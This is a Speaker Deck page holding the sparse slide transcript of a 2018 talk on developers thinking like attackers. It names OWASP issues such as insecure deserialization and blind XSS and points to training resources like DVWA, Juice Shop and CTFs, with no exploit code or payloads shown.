Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Thinking Like an Attacker
Search
Nick Le Mouton
February 05, 2018
Technology
0
100
Thinking Like an Attacker
Nick Le Mouton
February 05, 2018
Tweet
Share
Other Decks in Technology
See All in Technology
クラウド開発の舞台裏とSRE文化の醸成 / SRE NEXT 2025 Lunch Session
kazeburo
1
400
CDKコード品質UP!ナイスな自作コンストラクタを作るための便利インターフェース
harukasakihara
2
160
事例で学ぶ!B2B SaaSにおけるSREの実践例/SRE for B2B SaaS: A Real-World Case Study
bitkey
1
270
推し書籍📚 / Books and a QA Engineer
ak1210
0
120
IPA&AWSダブル全冠が明かす、人生を変えた勉強法のすべて
iwamot
PRO
2
220
Operating Operator
shhnjk
1
640
Lufthansa ®️ USA Contact Numbers: Complete 2025 Support Guide
lufthanahelpsupport
0
230
AWS CDK 開発を成功に導くトラブルシューティングガイド
wandora58
3
140
[SRE NEXT] ARR150億円_エンジニア140名_27チーム_17プロダクトから始めるSLO.pdf
satos
3
1.7k
【LT会登壇資料】TROCCO新コネクタ「スマレジ」を活用した直営店データの分析
kazari0425
1
140
DBのスキルで生き残る技術 - AI時代におけるテーブル設計の勘所
soudai
PRO
54
22k
「Chatwork」のEKS環境を支えるhelmfileを使用したマニフェスト管理術
hanayo04
1
210
Featured
See All Featured
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
16k
Build your cross-platform service in a week with App Engine
jlugia
231
18k
Rails Girls Zürich Keynote
gr2m
95
14k
A designer walks into a library…
pauljervisheath
207
24k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
2.9k
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
8
700
The Cult of Friendly URLs
andyhume
79
6.5k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
50
5.5k
Designing for Performance
lara
610
69k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
Code Reviewing Like a Champion
maltzj
524
40k
Transcript
Thinking Like an Attacker (Hacking Your Own Organisation)
# whoami • Nick Le Mouton (@noodlesnz) • CTO Drugs.com
• Developer • Security • Operations
None
None
None
Googlebot
A2:2017 Broken Authentication
None
• Disconnect between security and developers • Security find vulnerabilities
• Developers fix vulnerabilities • Security often don’t impart how they found the vulnerabilities in the first place
• Best position to attack an application • Shift Mindset
• Logic and knowledge
None
None
Object Injection Example • A8:2017 Insecure Deserialization
None
None
GuzzleHttp\Cookie\CookieJar
Payload
None
None
Blind XSS • A7:2017-Cross-Site Scripting (XSS) • Security scan shows
no XSS vulnerability
XSS Hunter
So How Can I Do That? • Offensive Security Courses
• Hack Yourself First by Troy Hunt (pluralsight.com) • https://infosec101.nz/
• Start hacking things, find out what works and what
doesn’t • Damn Vulnerable Web Application (DVWA) • OWASP Juice Shop Project
CTFs • CTFLearn.com • Find upcoming online CTFs on ctftime.org
• Read write ups at ctftime.org/writeups
Thank You